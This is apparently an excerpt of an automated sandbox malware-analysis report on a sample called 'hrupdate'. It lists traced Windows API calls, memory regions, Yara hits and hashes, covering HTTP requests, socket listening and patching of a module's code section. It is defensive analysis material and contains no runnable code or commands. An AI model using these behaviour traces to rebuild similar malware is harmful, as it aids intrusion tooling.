                                      • Instruction Fuzzy Hash: 41415E308487858AD725DB65DC49BEABBE5FBA9314F00660DE98C521A2EF7062C4CB52

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 00671B47
                                      • GetModuleHandleA.KERNEL32 ref: 00671B62
                                      • K32GetModuleInformation.KERNEL32(00000000,00000000,?,0000000C), ref: 00671B73
                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671B8F
                                      • CreateFileMappingW.KERNELBASE(00000000,00000000,01000002,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671BA6
                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671BB8
                                      • VirtualProtect.KERNEL32(?,?,00000040,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C2C
                                      • memcpy.VCRUNTIME140(?,?,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C43
                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 00671C5C
                                      • CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C76
                                      • CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C7B
                                      • CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C80
                                      • FreeLibrary.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C85
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: Handle$CloseFile$CreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewmemcpy
                                      • String ID: .text
                                      • API String ID: 3896868005-2719751843

                                      Control-flow Graph

                                      APIs
                                      • _memset.LIBCMT ref: 046970DF
                                      • __snprintf.LIBCMT ref: 04697106
                                        • Part of subcall function 0469E3F2: _memset.LIBCMT ref: 0469E413
                                      • __snprintf.LIBCMT ref: 04697182
                                      • __snprintf.LIBCMT ref: 04697199
                                      • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,*/*,046DA668), ref: 046971C8
                                      • HttpSendRequestA.WININET(00000000,?,?,046972C1,?), ref: 046971F1
                                      • InternetCloseHandle.WININET(00000000), ref: 0469720E
                                        • Part of subcall function 0469A9C6: _memset.LIBCMT ref: 0469A9D6
                                        • Part of subcall function 0469A9C6: _memset.LIBCMT ref: 0469A9E2
                                        • Part of subcall function 0469A9C6: __snprintf.LIBCMT ref: 0469AA33
                                        • Part of subcall function 0469A9C6: _memset.LIBCMT ref: 0469AA6A
                                        • Part of subcall function 0469A9C6: _memset.LIBCMT ref: 0469AA75
                                        • Part of subcall function 0469AA90: _memset.LIBCMT ref: 0469AAA0
                                        • Part of subcall function 0469AA90: _memset.LIBCMT ref: 0469AAAC
                                        • Part of subcall function 0469AA90: __snprintf.LIBCMT ref: 0469AB08
                                        • Part of subcall function 0469AA90: _memset.LIBCMT ref: 0469AB26
                                        • Part of subcall function 0469AA90: _memset.LIBCMT ref: 0469AB31
                                      • InternetQueryDataAvailable.WININET(00000000,0469483D,00000000,00000000), ref: 0469721F
                                      • InternetReadFile.WININET(00000000,?,00001000,?), ref: 0469724D
                                      • InternetCloseHandle.WININET(00000000), ref: 0469726D
                                      • InternetCloseHandle.WININET(00000000), ref: 0469728E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset$Internet__snprintf$CloseHandle$HttpRequest$AvailableDataFileOpenQueryReadSend
                                      • String ID: %s%s$*/*
                                      • API String ID: 2172916581-856325523

                                      Control-flow Graph

                                      APIs
                                      • _Query_perf_frequency.MSVCP140 ref: 006712F3
                                      • _Query_perf_counter.MSVCP140 ref: 00671305
                                      • __alldvrm.LIBCMT ref: 00671310
                                      • _Query_perf_frequency.MSVCP140(?,00000000), ref: 00671322
                                      • _Query_perf_counter.MSVCP140(?,00000000), ref: 00671330
                                      • __alldvrm.LIBCMT ref: 00671341
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00671399
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006713C0
                                      • _Xtime_get_ticks.MSVCP140(00000000,?,00000000,00000000,00000000,00000000,3B9ACA00,00000000,00000000,?,?,00000000,?,00000000,3B9ACA00,00000000), ref: 006713EA
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0067140C
                                      • _Thrd_sleep.MSVCP140(00000000,00000000,?,3B9ACA00,00000000,00000000,?,00000064,00000000,?,00000000,00000000,00000000,00000000,3B9ACA00,00000000), ref: 00671434
                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 0067146D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$Query_perf_counterQuery_perf_frequency__alldvrm$Thrd_sleepXbad_function_call@std@@Xtime_get_ticks
                                      • String ID:
                                      • API String ID: 1496849827-0

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF65
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF75
                                        • Part of subcall function 046A1BB6: __time64.LIBCMT ref: 046A1BC8
                                        • Part of subcall function 046A1BB6: _malloc.LIBCMT ref: 046A1C0F
                                        • Part of subcall function 046A1BB6: _memset.LIBCMT ref: 046A1C1C
                                        • Part of subcall function 046A1BB6: _strtok.LIBCMT ref: 046A1C36
                                        • Part of subcall function 0469A70C: __time64.LIBCMT ref: 0469A71D
                                        • Part of subcall function 046A4B98: _malloc.LIBCMT ref: 046A4BBF
                                        • Part of subcall function 046A4B98: _memset.LIBCMT ref: 046A4BED
                                        • Part of subcall function 046A4B98: _realloc.LIBCMT ref: 046A4BCE
                                      • _malloc.LIBCMT ref: 04694661
                                      • GetLocalTime.KERNEL32(?), ref: 046946BF
                                      • GetLocalTime.KERNEL32(?), ref: 04694758
                                      • __snprintf.LIBCMT ref: 046947AC
                                      • __snprintf.LIBCMT ref: 046947BF
                                      • __snprintf.LIBCMT ref: 046947E0
                                      • __time64.LIBCMT ref: 04694884
                                      • __time64.LIBCMT ref: 04694939
                                      • GetLocalTime.KERNEL32(?), ref: 04694709
                                        • Part of subcall function 046A3F47: Sleep.KERNEL32(000003E8,00000080,00000000,00000000,?,?,046949A6), ref: 046A3FAE
                                        • Part of subcall function 046A3F47: RtlExitUserThread.NTDLL(00000000,00000080,00000000,00000000,?,?,046949A6), ref: 046A3FE7
                                        • Part of subcall function 046A3F47: WaitForSingleObject.KERNEL32(00000000,?,?,046949A6), ref: 046A4003
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _malloc$__time64$LocalTime__snprintf$_memset$ExitObjectSingleSleepThreadUserWait_realloc_strtok
                                      • String ID:
                                      • API String ID: 4021925118-0

                                      Control-flow Graph

                                      APIs
                                      • GetACP.KERNEL32(00000080,00000000,00000000,?,?,?,?,?,?,?,?,0469469C,00000000,00000000), ref: 0469CE0C
                                      • GetOEMCP.KERNEL32(?,?,?,?,?,?,?,?,0469469C,00000000,00000000), ref: 0469CE18
                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0469469C,00000000), ref: 0469CE45
                                      • GetTickCount.KERNEL32 ref: 0469CE49
                                        • Part of subcall function 046AEFA9: __getptd.LIBCMT ref: 046AEFAE
                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0469469C,00000000), ref: 0469CE76
                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,0469469C,00000000), ref: 0469CEDC
                                      • _memset.LIBCMT ref: 0469CF13
                                      • _memset.LIBCMT ref: 0469CF52
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CurrentProcess$_memset$CountTick__getptd
                                      • String ID:
                                      • API String ID: 3908538216-0

                                      Control-flow Graph

                                      APIs
                                      • GetDlgItem.USER32(?,000003E8), ref: 00671A52
                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00671A64
                                      • KillTimer.USER32(?,00000001), ref: 00671A72
                                      • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 00671A7B
                                      • DialogBoxParamW.USER32(00000081,?,00671B00,00000000), ref: 00671A94
                                      • SetTimer.USER32(?,00000001,000003E8,00000000), ref: 00671ACE
                                      • EndDialog.USER32(?,00000000), ref: 00671AE4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: DialogTimer$CallbackDispatcherItemKillMessageParamSendUser
                                      • String ID:
                                      • API String ID: 182125530-0

                                      Control-flow Graph

                                      APIs
                                      • DefWindowProcW.USER32(?,?,?,?), ref: 0067193E
                                      • DefWindowProcW.USER32(?,00000111,?,?), ref: 00671970
                                      • BeginPaint.USER32(?,?), ref: 006719D3
                                      • EndPaint.USER32(?,?), ref: 006719DF
                                      • PostQuitMessage.USER32(00000000), ref: 006719FB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: PaintProcWindow$BeginMessagePostQuit
                                      • String ID:
                                      • API String ID: 3181456275-0

                                      Control-flow Graph

                                      APIs
                                      • _Mtx_lock.MSVCP140(?,A92820B5,?,?,?,?,00673EB0,000000FF), ref: 00672B3B
                                      • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00672B4F
                                      • _Cnd_signal.MSVCP140 ref: 00672B5B
                                      • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000,00000000), ref: 00672B69
                                      • _Mtx_unlock.MSVCP140(00000000,00000000), ref: 00672B71
                                      • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00672B7F
                                      • _Cnd_do_broadcast_at_thread_exit.MSVCP140 ref: 00672B8B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: C_error@std@@Throw_$Cnd_do_broadcast_at_thread_exitCnd_signalMtx_lockMtx_unlock
                                      • String ID:
                                      • API String ID: 35399794-0

                                      Control-flow Graph

                                      APIs
                                      • _malloc.LIBCMT ref: 0469DC5D
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                      • htonl.WS2_32(046DAEF0), ref: 0469DC89
                                      • recvfrom.WS2_32(676494AD,046DAEF0,000FFFFC,00000000,?,?), ref: 0469DCB8
                                      • WSAGetLastError.WS2_32 ref: 0469DCC3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateErrorHeapLast_mallochtonlrecvfrom
                                      • String ID:
                                      • API String ID: 987280018-0
                                      APIs
                                      • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,006727F7,00000000,00000000,?,?,?,00000000), ref: 00672DD7
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,006727F7,00000000,00000000,?,?,?,00000000), ref: 00672DE4
                                      • _CxxThrowException.VCRUNTIME140(00000000,00674C5C,00000000), ref: 0067328C
                                      • _CxxThrowException.VCRUNTIME140(00000000,00674CB0,00000000), ref: 006732A9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: ExceptionThrow$_callnewhmalloc
                                      • String ID: Unknown exception
                                      • API String ID: 4113974480-410509341
                                      APIs
                                        • Part of subcall function 046972DB: WSAStartup.WS2_32(00000202,?), ref: 046972FC
                                        • Part of subcall function 046972DB: WSACleanup.WS2_32 ref: 04697306
                                      • WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 046973AC
                                      • WSAIoctl.WS2_32(00000000,4004747F,00000000,00000000,?,000005F0,00000001,00000000,00000000), ref: 046973D7
                                      • closesocket.WS2_32(00000000), ref: 04697416
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CleanupIoctlSocketStartupclosesocket
                                      • String ID:
                                      • API String ID: 1100289767-0
                                      • Opcode ID: 730618842d4896ce921020d42c0e1c03074ff07817c521891b671c48d90ced2b
                                      • Instruction ID: 3360419639fd02b63694f65e7e31953374672c71655803faceed7fe17870fa97
                                      • Opcode Fuzzy Hash: 730618842d4896ce921020d42c0e1c03074ff07817c521891b671c48d90ced2b
                                      • Instruction Fuzzy Hash: 1511EB31710218BBEB208E65CC88FFB7FEDDF857A2F004025F609C2181F674AC418960
                                      APIs
                                      • InternetSetOptionA.WININET(00000000,00000005,0003A980,00000004), ref: 04696C21
                                      • InternetSetOptionA.WININET(00000006,0003A980,00000004), ref: 04696C31
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InternetOption
                                      • String ID:
                                      • API String ID: 3327645240-0
                                      • Opcode ID: 5af060adb2f272de5ac62e5b97abf5c66943b6c8e233d38e74597abaace99b30
                                      • Instruction ID: 0bebca4fc4591970bc3aff14af0dd80e62c7ea46811936b39983fe6565a4c026
                                      • Opcode Fuzzy Hash: 5af060adb2f272de5ac62e5b97abf5c66943b6c8e233d38e74597abaace99b30
                                      • Instruction Fuzzy Hash: 9F01DBA5A4176CF6EF316B60ED09FFA7A9CD711B54F400015B601DA1D0F6F4AE50A6D0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _malloc_memset
                                      • String ID:
                                      • API String ID: 4137368368-0
                                      • Opcode ID: bd2c0968d70933de71f735b608e66aa7a97fb2dcebf71dbb3f572718e7a1dbbe
                                      • Instruction ID: 75f3e97fef6ad50c001969696916805ceb40f7ebd2cabb12e2da939dcc9739a3
                                      • Opcode Fuzzy Hash: bd2c0968d70933de71f735b608e66aa7a97fb2dcebf71dbb3f572718e7a1dbbe
                                      • Instruction Fuzzy Hash: FB016DB1A05A109FE720AFA4EC40B577BE8EF54759F00452EE84997340F779BC1A8F98
                                      APIs
                                        • Part of subcall function 04696BC4: InternetSetOptionA.WININET(00000000,00000005,0003A980,00000004), ref: 04696C21
                                        • Part of subcall function 04696BC4: InternetSetOptionA.WININET(00000006,0003A980,00000004), ref: 04696C31
                                      • InternetSetOptionA.WININET(00000000,0000002B,00000000,00000000), ref: 04696CA1
                                      • InternetSetOptionA.WININET(0000002C,00000000,00000000), ref: 04696CBD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InternetOption
                                      • String ID:
                                      • API String ID: 3327645240-0
                                      • Opcode ID: 2353327cdd1e553b8b62b5f830da047a9a408e462482d77d8b9e5079140f11c4
                                      • Instruction ID: 65e8aa805e08870183f782c465055b4d025318735ab3e9fbf58133a8a3b731bf
                                      • Opcode Fuzzy Hash: 2353327cdd1e553b8b62b5f830da047a9a408e462482d77d8b9e5079140f11c4
                                      • Instruction Fuzzy Hash: 6A018B71A45754B6FF307B74AC05FA53B8DDB00768F10541AF900591C1FDB9EC909E98
                                      APIs
                                      • HeapCreate.KERNEL32(00040000,00000000,00000000,?,00000004,?), ref: 00F3C0A3
                                      • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00F3C0B8
                                      Memory Dump Source
                                      • Source File: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_3_f30000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCreate
                                      • String ID:
                                      • API String ID: 2875408731-0
                                      • Opcode ID: a1d591106e10ad5d9a199ab925d8206d06663360d4494dab4b31c1a7f6544c4c
                                      • Instruction ID: bd44e0d39c3bb3f05f0b3ebeddbb53e393fec294f036436bc5199bfaa5c12aaa
                                      • Opcode Fuzzy Hash: a1d591106e10ad5d9a199ab925d8206d06663360d4494dab4b31c1a7f6544c4c
                                      • Instruction Fuzzy Hash: BC1143B8A00209AFDB04CF44D496B9ABBB1FB58354F1081A9ED089B391D771A995CFD0
                                      APIs
                                        • Part of subcall function 0469D902: htonl.WS2_32(0469489E), ref: 0469D93C
                                        • Part of subcall function 0469D902: select.WS2_32(00000000,?,?,?,?), ref: 0469D9A0
                                        • Part of subcall function 0469D902: __WSAFDIsSet.WS2_32(34E85900,?), ref: 0469D9BC
                                        • Part of subcall function 0469D902: accept.WS2_32(34E85900,00000000,00000000), ref: 0469D9D1
                                        • Part of subcall function 0469D902: ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 0469D9E4
                                      • GetTickCount.KERNEL32 ref: 0469DD97
                                        • Part of subcall function 0469DC39: _malloc.LIBCMT ref: 0469DC5D
                                        • Part of subcall function 0469DC39: htonl.WS2_32(046DAEF0), ref: 0469DC89
                                        • Part of subcall function 0469DC39: recvfrom.WS2_32(676494AD,046DAEF0,000FFFFC,00000000,?,?), ref: 0469DCB8
                                        • Part of subcall function 0469DC39: WSAGetLastError.WS2_32 ref: 0469DCC3
                                      • GetTickCount.KERNEL32 ref: 0469DDAA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountTickhtonl$ErrorLast_mallocacceptioctlsocketrecvfromselect
                                      • String ID:
                                      • API String ID: 597769433-0
                                      • Opcode ID: cd64c52258221071affa8da24593c197c077184f0c2cff5cbf06565508432017
                                      • Instruction ID: ac565580b835b0a2d835fa41f08a982a2239b69f5f760debb7e7330aaeeb592a
                                      • Opcode Fuzzy Hash: cd64c52258221071affa8da24593c197c077184f0c2cff5cbf06565508432017
                                      • Instruction Fuzzy Hash: B2D0A982A1102809BB0037A5AC404AE4BCD8A824B8338003FE040C2200FEC8BC0647BA
                                      APIs
                                      • _calloc.LIBCMT ref: 046A6F2C
                                        • Part of subcall function 046BCB50: __calloc_impl.LIBCMT ref: 046BCB65
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __calloc_impl_calloc
                                      • String ID:
                                      • API String ID: 2108883976-0
                                      • Opcode ID: 600ae0fb66e5a81b39ab67434c6ff557fde242639536df2de6a63d6d8bbdb05e
                                      • Instruction ID: 7f168a712908f7e21554c585a93a7d63fd0470b0228600db7448a274df0bbbd8
                                      • Opcode Fuzzy Hash: 600ae0fb66e5a81b39ab67434c6ff557fde242639536df2de6a63d6d8bbdb05e
                                      • Instruction Fuzzy Hash: C9A119B1900608EFDF259F94CC45EAEBBB6FF89300F104599E541AB250E772AD91DF60
                                      APIs
                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,00F3BCAB,AAAABBBB,?,?,?,?), ref: 00F3C3D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_3_f30000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 52b2a5cd8be6c39a7177695a6cfaf2b078eabeb2ff83b80fc3f6fd0b178b378e
                                      • Instruction ID: 1039fb296e5c883795e4866e251e5c07380bc9773e266b3fd723372186c408fd
                                      • Opcode Fuzzy Hash: 52b2a5cd8be6c39a7177695a6cfaf2b078eabeb2ff83b80fc3f6fd0b178b378e
                                      • Instruction Fuzzy Hash: B751EA75A0010ADFCF04CF98C890AAEB7B1FF88314F2481A9D915AB355D734AE51DF90
                                      APIs
                                      • InternetConnectA.WININET(046DA658,?,?,00000000,00000000,00000003,00000000,046DA668), ref: 046958B5
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A048
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A09F
                                        • Part of subcall function 04699F1A: _malloc.LIBCMT ref: 04699F5B
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699F6C
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699FB7
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 0469A00C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _malloc_memset$ConnectInternet
                                      • String ID:
                                      • API String ID: 3195992531-0
                                      • Opcode ID: 47bb71635ee546373b5158b663072026b9da5b489052d683b770be4a61a873ec
                                      • Instruction ID: 4b079f4a1ab064be7a9a1ee773e556f1dd1b91c6805042ece113fc564a83ce29
                                      • Opcode Fuzzy Hash: 47bb71635ee546373b5158b663072026b9da5b489052d683b770be4a61a873ec
                                      • Instruction Fuzzy Hash: 3C116A92A032207AEB603EE25C49EE73ECCDF276E8F001424BA0D55182F4BD9D1483F5
                                      APIs
                                      • HeapDestroy.KERNEL32(?), ref: 0469F6B2
                                        • Part of subcall function 046A15AD: _memset.LIBCMT ref: 046A15CD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DestroyHeap_memset
                                      • String ID:
                                      • API String ID: 3970643317-0
                                      • Opcode ID: bed628a4d13ad085a4afe248a82b35631558d55bd5cf806b867f8d6943affbbc
                                      • Instruction ID: 2feeb952a9fe68161ef0709712cbffe1777421043f9437f91dd1d1b01a0a9f56
                                      • Opcode Fuzzy Hash: bed628a4d13ad085a4afe248a82b35631558d55bd5cf806b867f8d6943affbbc
                                      • Instruction Fuzzy Hash: 9C11E731604304ABDF38AE249C44F7A33DCEB26724F260019FC04C52A1FAA5FD519A99
                                      APIs
                                      • InternetOpenA.WININET(?,?,04694826,00000000,00000000), ref: 046957EB
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A048
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A09F
                                        • Part of subcall function 04699F1A: _malloc.LIBCMT ref: 04699F5B
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699F6C
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699FB7
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 0469A00C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _malloc_memset$InternetOpen
                                      • String ID:
                                      • API String ID: 4223322473-0
